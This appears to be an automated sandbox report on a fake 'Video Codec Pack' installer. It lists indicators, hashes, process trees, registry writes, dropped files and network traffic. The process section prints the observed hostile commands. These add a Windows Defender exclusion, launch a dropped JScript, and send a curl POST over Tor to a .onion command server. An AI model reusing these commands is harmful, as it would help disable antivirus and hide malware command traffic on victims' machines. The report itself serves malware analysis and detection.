File name:

xmpg_codec.exe

Full analysis: https://app.any.run/tasks/0eedb5b5-8b29-42c5-a080-75c5b4d91c2b
Verdict: Malicious activity
Analysis date: December 28, 2024, 19:12:03
OS: Windows 10 Professional (build: 19045, 64 bit)
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 11 sections
MD5:

3A7F402303B1A355BB2044D25502B9F6

SHA1:

D63A9324E3E544CAB121C456EFCFACAC0708AA54

SHA256:

9C1A0608BAE991AF50096ACAEC9D979DF9F9A3BB6E89D9D20972D6CFEB9582BB

SSDEEP:

98304:mrq3Bdwb7ra9MwctZHhlAsHqAgQk98AR8gybf3j6PsfZiCIDKmtp0SMBkPE6c+6s:hddGcMW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Adds path to the Windows Defender exclusion list

      • cmd.exe (PID: 6448)
      • xmpg_codec.tmp (PID: 6304)
    • Changes the autorun value in the registry

      • xmpg_codec.tmp (PID: 6304)
    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 7008)
    • Accesses environment variables (SCRIPT)

      • wscript.exe (PID: 7008)
    • Accesses BIOS(Win32_BIOS, may evade sandboxes) via WMI (SCRIPT)

      • wscript.exe (PID: 7008)
    • Gets TEMP folder path (SCRIPT)

      • wscript.exe (PID: 7008)
    • Opens a text file (SCRIPT)

      • wscript.exe (PID: 7008)
    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 7008)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • xmpg_codec.exe (PID: 4472)
      • xmpg_codec.exe (PID: 6280)
      • xmpg_codec.tmp (PID: 6304)
    • Reads security settings of Internet Explorer

      • xmpg_codec.tmp (PID: 5604)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 6448)
    • Script adds exclusion path to Windows Defender

      • cmd.exe (PID: 6448)
    • The process executes JS scripts

      • cmd.exe (PID: 6956)
    • Reads the Windows owner or organization settings

      • xmpg_codec.tmp (PID: 6304)
    • Starts CMD.EXE for commands execution

      • xmpg_codec.tmp (PID: 6304)
    • Connects to unusual port

      • tor.exe (PID: 7060)
    • Executes WMI query (SCRIPT)

      • wscript.exe (PID: 7008)
    • Uses WMI to retrieve WMI-managed resources (SCRIPT)

      • wscript.exe (PID: 7008)
    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 7008)
    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 7008)
    • Checks whether a specific file exists (SCRIPT)

      • wscript.exe (PID: 7008)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 7008)
  • INFO

    • Reads the computer name

      • xmpg_codec.tmp (PID: 5604)
      • xmpg_codec.exe (PID: 6280)
      • xmpg_codec.tmp (PID: 6304)
      • tor.exe (PID: 7060)
    • Process checks computer location settings

      • xmpg_codec.tmp (PID: 5604)
    • Create files in a temporary directory

      • xmpg_codec.exe (PID: 4472)
      • xmpg_codec.exe (PID: 6280)
      • xmpg_codec.tmp (PID: 6304)
      • curl.exe (PID: 3848)
    • Checks supported languages

      • xmpg_codec.exe (PID: 4472)
      • xmpg_codec.exe (PID: 6280)
      • xmpg_codec.tmp (PID: 5604)
      • xmpg_codec.tmp (PID: 6304)
      • curl.exe (PID: 3848)
      • tor.exe (PID: 7060)
    • The process uses the downloaded file

      • powershell.exe (PID: 6516)
      • wscript.exe (PID: 7008)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6516)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6516)
    • Creates files in the program directory

      • xmpg_codec.tmp (PID: 6304)
    • Creates a software uninstall entry

      • xmpg_codec.tmp (PID: 6304)
    • Creates files or folders in the user directory

      • tor.exe (PID: 7060)
    • Execution of CURL command

      • wscript.exe (PID: 7008)
    • Reads the machine GUID from the registry

      • tor.exe (PID: 7060)
    • Reads Internet Explorer settings

      • wscript.exe (PID: 7008)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Inno Setup installer (53.5)
.exe | InstallShield setup (21)
.exe | Win32 EXE PECompact compressed (generic) (20.2)
.exe | Win32 Executable (generic) (2.1)
.exe | Win16/32 Executable Delphi generic (1)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2024:07:12 07:26:53+00:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 2.25
CodeSize: 685056
InitializedDataSize: 159744
UninitializedDataSize: -
EntryPoint: 0xa83bc
OSVersion: 6.1
ImageVersion: -
SubsystemVersion: 6.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x003f
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: Neutral
CharacterSet: Unicode
Comments: This installation was built with Inno Setup.
CompanyName: MMPEG LAB
FileDescription: Video Codec Pack Setup
FileVersion:
LegalCopyright:
OriginalFileName:
ProductName: Video Codec Pack
ProductVersion: 1.5
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
145
Monitored processes
14
Malicious processes
6
Suspicious processes
2

Behavior graph

Click at the process to see the details
start xmpg_codec.exe xmpg_codec.tmp no specs xmpg_codec.exe xmpg_codec.tmp cmd.exe no specs conhost.exe no specs powershell.exe no specs cmd.exe no specs conhost.exe no specs wscript.exe no specs tor.exe conhost.exe no specs curl.exe no specs conhost.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
3848"C:\Windows\System32\curl.exe" -X POST -d "GUID=null&action=GUID" --socks5-hostname localhost:9050 http://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad.onion/route.php -o C:\Users\admin\AppData\Local\Temp\cfileC:\Windows\SysWOW64\curl.exewscript.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\syswow64\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ws2_32.dll
c:\windows\syswow64\rpcrt4.dll
4472"C:\Users\admin\AppData\Local\Temp\xmpg_codec.exe" C:\Users\admin\AppData\Local\Temp\xmpg_codec.exe
explorer.exe
User:
admin
Company:
MMPEG LAB
Integrity Level:
MEDIUM
Description:
Video Codec Pack Setup
Exit code:
0
Version:
Modules
Images
c:\users\admin\appdata\local\temp\xmpg_codec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\comctl32.dll
5604"C:\Users\admin\AppData\Local\Temp\is-27RU1.tmp\xmpg_codec.tmp" /SL5="$9028C,3265534,845824,C:\Users\admin\AppData\Local\Temp\xmpg_codec.exe" C:\Users\admin\AppData\Local\Temp\is-27RU1.tmp\xmpg_codec.tmpxmpg_codec.exe
User:
admin
Company:
MMPEG LAB
Integrity Level:
MEDIUM
Description:
Setup/Uninstall
Exit code:
0
Version:
51.1052.0.0
Modules
Images
c:\users\admin\appdata\local\temp\is-27ru1.tmp\xmpg_codec.tmp
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\comdlg32.dll
5888\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execurl.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6280"C:\Users\admin\AppData\Local\Temp\xmpg_codec.exe" /SPAWNWND=$50306 /NOTIFYWND=$9028C C:\Users\admin\AppData\Local\Temp\xmpg_codec.exe
xmpg_codec.tmp
User:
admin
Company:
MMPEG LAB
Integrity Level:
HIGH
Description:
Video Codec Pack Setup
Exit code:
0
Version:
Modules
Images
c:\users\admin\appdata\local\temp\xmpg_codec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\comctl32.dll
6304"C:\Users\admin\AppData\Local\Temp\is-JAOSC.tmp\xmpg_codec.tmp" /SL5="$602E0,3265534,845824,C:\Users\admin\AppData\Local\Temp\xmpg_codec.exe" /SPAWNWND=$50306 /NOTIFYWND=$9028C C:\Users\admin\AppData\Local\Temp\is-JAOSC.tmp\xmpg_codec.tmp
xmpg_codec.exe
User:
admin
Company:
MMPEG LAB
Integrity Level:
HIGH
Description:
Setup/Uninstall
Exit code:
0
Version:
51.1052.0.0
Modules
Images
c:\users\admin\appdata\local\temp\is-jaosc.tmp\xmpg_codec.tmp
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\comdlg32.dll
6448"cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Controller\'C:\Windows\SysWOW64\cmd.exexmpg_codec.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6456\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6516powershell -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Controller\'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
6956"cmd.exe" /C wscript.exe "C:/Program Files (x86)/Controller/ntdlg.js"C:\Windows\SysWOW64\cmd.exexmpg_codec.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
Total events
7 346
Read events
7 326
Write events
20
Delete events
0

Modification events

(PID) Process:(6304) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:Inno Setup: Setup Version
Value:
6.3.3
(PID) Process:(6304) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:Inno Setup: App Path
Value:
C:\Program Files (x86)\Controller
(PID) Process:(6304) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:InstallLocation
Value:
C:\Program Files (x86)\Controller\
(PID) Process:(6304) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:Inno Setup: Icon Group
Value:
Video Codec Pack
(PID) Process:(6304) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:Inno Setup: User
Value:
admin
(PID) Process:(6304) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:Inno Setup: Language
Value:
english
(PID) Process:(6304) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:DisplayName
Value:
Video Codec Pack version 1.5
(PID) Process:(6304) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:UninstallString
Value:
"C:\Program Files (x86)\Controller\unins000.exe"
(PID) Process:(6304) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:QuietUninstallString
Value:
"C:\Program Files (x86)\Controller\unins000.exe" /SILENT
(PID) Process:(6304) xmpg_codec.tmpKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{7EADDEF0-C53B-4E9E-B5E4-62ABFEA3E5CF}_is1
Operation:writeName:DisplayVersion
Value:
1.5
Executable files
7
Suspicious files
2
Text files
20
Unknown types
0

Dropped files

PID
Process
Filename
Type
6304xmpg_codec.tmpC:\Program Files (x86)\Controller\unins000.exeexecutable
MD5:DB518BD52B3ECB5E564836844B8D2D77
SHA256:9F15BCC164656E92075BD3036D47ED264C258031D5B5EFCC216794BEE078A4BF
6304xmpg_codec.tmpC:\Program Files (x86)\Controller\is-DMSPA.tmpexecutable
MD5:5D132FB6EC6FAC12F01687F2C0375353
SHA256:6B866C187A0DEE2FB751A8990D50DC1ED83F68E025720081E4D8E27097067DC8
6516powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:C56B23683E3872010C368F1B799DD20E
SHA256:CA128A4A413959399572BB2C49E170FB6247A73DB0DD877393538FF2CDEB2028
6304xmpg_codec.tmpC:\Program Files (x86)\Controller\ntdlg.jstext
MD5:864BEFD925D922F91750256D5348EDA1
SHA256:2EC555C34F0AF1514501CA5E4D999C843D5B9DE7973467820FCF6034A517C4CC
6516powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_m43db5kt.jha.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6304xmpg_codec.tmpC:\Program Files (x86)\Controller\is-T1M7C.tmpexecutable
MD5:DB518BD52B3ECB5E564836844B8D2D77
SHA256:9F15BCC164656E92075BD3036D47ED264C258031D5B5EFCC216794BEE078A4BF
6304xmpg_codec.tmpC:\Program Files (x86)\Controller\tor.exeexecutable
MD5:5D132FB6EC6FAC12F01687F2C0375353
SHA256:6B866C187A0DEE2FB751A8990D50DC1ED83F68E025720081E4D8E27097067DC8
6304xmpg_codec.tmpC:\Program Files (x86)\Controller\unins000.datbinary
MD5:D2C7BC4349EA0DAF19644FEB0A570ED4
SHA256:F33EC511B2E2EFAFEE3B89667092743079A5BA0A674D962320212ADFBDBDF5AB
6516powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p12hisjl.1yt.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6516powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rlof4lu2.awj.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
36
DNS requests
17
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6544
SIHClient.exe
GET
200
23.215.121.133:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
GET
200
23.215.121.133:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
GET
200
23.215.121.133:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
23.48.23.143:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6544
SIHClient.exe
GET
200
23.215.121.133:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4120
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.48.23.143:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
23.215.121.133:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5064
SearchApp.exe
2.21.110.139:443
www.bing.com
AKAMAI-AS
DE
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
4
System
192.168.100.255:138
whitelisted
1176
svchost.exe
20.190.159.68:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 23.48.23.143
  • 23.48.23.166
whitelisted
www.microsoft.com
  • 23.215.121.133
whitelisted
www.bing.com
  • 2.21.110.139
  • 2.21.110.146
whitelisted
google.com
  • 172.217.23.110
unknown
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.68
  • 40.126.31.69
  • 40.126.31.71
  • 20.190.159.2
  • 40.126.31.73
  • 20.190.159.0
  • 20.190.159.71
  • 20.190.159.23
whitelisted
go.microsoft.com
  • 23.213.166.81
unknown
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 52.165.164.15
whitelisted

Threats

PID
Process
Class
Message
7060
tor.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 114
7060
tor.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 252
7060
tor.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 660
7060
tor.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 114
No debug info